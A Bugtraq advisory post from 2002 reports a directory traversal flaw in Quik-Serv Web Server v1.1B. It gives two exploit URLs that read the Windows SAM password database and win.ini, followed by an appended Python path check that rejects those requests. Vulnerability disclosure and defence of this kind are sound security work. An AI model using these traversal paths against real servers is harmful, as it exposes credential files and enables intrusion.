Bugtraq mailing list archives
Quik-Serv Web Server v1.1B Arbitrary File Disclosure
From: "a b" <p0pt4rtz () hotmail com>
Date: Wed, 03 Apr 2002 13:20:44 -0800
Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small webserver with CGI implemented into it. The server is vulnerable to a directory transversal which allows a remote user to display arbitrary files.

Exploit:
To display the SAM database
http://server/../../../winnt/repair/sam

To display the win.ini file
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use the product.

Vendor Status:
The vendor has been contacted. But received no reply.

--
p0p t4rtz
p0pt4rtz () hotmail com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/
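A server-side path check that refuses the two request paths shown in the advisory, given here as an added example that is not part of the original post and not the vendor's code. The function names and the `wwwroot` document root are assumptions made for illustration.

```python
import os
from urllib.parse import unquote


class PathRejected(Exception):
    """Raised when a request path must not be served."""


def resolve_request_path(docroot, url_path):
    """Map a URL path to a file under docroot, or raise PathRejected."""
    # Drop the query string and percent-decode once, so %2e%2e%2f is
    # inspected in the same form the filesystem would see.
    decoded = unquote(url_path.split("?", 1)[0])
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    # Windows accepts both separators; normalise before splitting.
    segments = [s for s in decoded.replace("\\", "/").split("/")
                if s not in ("", ".")]
    for seg in segments:
        # Strict policy: refuse any parent reference or drive/stream
        # specifier instead of trying to normalise it away.
        if seg == ".." or ":" in seg:
            raise PathRejected("forbidden segment: %r" % seg)
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Containment check on the resolved path also catches symlinks or
    # junctions inside the document root that point elsewhere.
    try:
        contained = os.path.commonpath([root, candidate]) == root
    except ValueError:  # e.g. different drives on Windows
        contained = False
    if not contained:
        raise PathRejected("resolved path escapes document root")
    return candidate


def is_allowed(docroot, url_path):
    """Boolean wrapper, convenient for logging or tests."""
    try:
        resolve_request_path(docroot, url_path)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Request paths from the advisory plus one ordinary request;
    # "wwwroot" is a placeholder document root.
    for p in ("/../../../winnt/win.ini", "/../../../winnt/repair/sam", "/index.html"):
        print(p, is_allowed("wwwroot", p))
```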
